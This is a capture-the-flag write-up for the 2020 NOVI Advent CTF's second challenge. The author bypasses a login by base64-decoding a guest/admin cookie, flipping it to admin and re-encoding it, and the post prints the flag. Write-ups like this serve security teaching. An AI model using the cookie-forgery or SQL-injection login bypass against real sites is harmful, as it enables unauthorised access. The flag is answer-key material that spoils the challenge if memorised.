Overview
The NOVI University Of Applied Sciences is offering an Advent CTF challenge for December 2020. The CTF is created by our community member of the Hackdewereld.nl and Chief Lecturer for Cyber Security at the NOVI University, Arjen Wiersma. If you want to participate in these CTF challenges, you can create an account on the website https://www.adventofctf.com/.
Challenge 2
- Description: For the 2nd challenge you will need to bypass the login mechanism.
- 200 Points
I visited the URL https://02.adventofctf.com, and landed on a webpage with a login portal. Below the login portal there is the sentence visible: Do not try too hard.
I tried a SQL injection and some default username and password, and after clicking on Submit, I got redirected to the next page, and it seems that I’m logged in as Guest.
This user does not have the privileges to show the flag. I need to escalate the privileges to admin. I think I do not have to go so far, so let’s check the stored cookie in my internet browser, through the Developers Tools.
This is my cookie:
authenticated:"eyJndWVzdCI6InRydWUiLCJhZG1pbiI6ImZhbHNlIn0%3D"
This cookie is base64 encoded. After decoding this cookie, I can reveal the data in this cookie. I used CyberChef to decode this cookie and this is the value of the cookie:
This cookie says that the value of Guest equals True and the value of admin equals False. I need to change this cookie to Guest value equals False and the admin value equals True. Then, encode this cookie back to Base64 and modify the cookie in my internet browser to the new value. This is my new cookie value.
I updated the current cookie in my browser to the new value and refreshed the page. The flag is now visible! Flag: NOVI{cookies_are_bad_for_auth}.
Thanks for reading!